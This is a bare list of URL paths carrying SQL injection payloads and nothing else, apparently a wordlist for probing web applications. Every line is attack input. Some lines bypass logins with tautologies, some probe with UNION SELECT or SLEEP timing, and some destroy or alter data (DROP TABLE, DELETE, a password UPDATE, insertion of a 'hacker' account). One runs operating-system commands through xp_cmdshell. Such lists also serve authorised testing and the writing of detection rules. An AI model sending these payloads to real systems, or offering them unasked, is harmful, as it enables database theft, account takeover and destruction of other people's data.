/search?q=' OR 1=1 --
/products?id=1' OR '1'='1
/category?id=1 UNION SELECT 1,2,3
/article?id=1 AND 1=1
/user/profile?id=1' AND 1=0 UNION SELECT 1,2,3
/search?keyword=' UNION SELECT 1,2,3--
/products?id=1'; DROP TABLE users;--
/category?id=1 OR 1=1
/article?id=1 OR 1=1
/user?id=1 UNION ALL SELECT 1,2,3
/search?q=' OR 'x'='x
/login?username=admin' AND password LIKE '%
/products?id=1 AND SLEEP(5)
/category?id=1; SELECT * FROM users WHERE username='admin'
/article?id=1; UPDATE users SET password='12345' WHERE id=1
/user?id=1; DELETE FROM users WHERE id=1
/search?query='; EXEC xp_cmdshell 'dir'--
/products?id=1; EXEC sp_executesql N'SELECT * FROM users'
/category?id=1); INSERT INTO users (username, password) VALUES ('hacker', 'password');--
/article?id=1' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%')
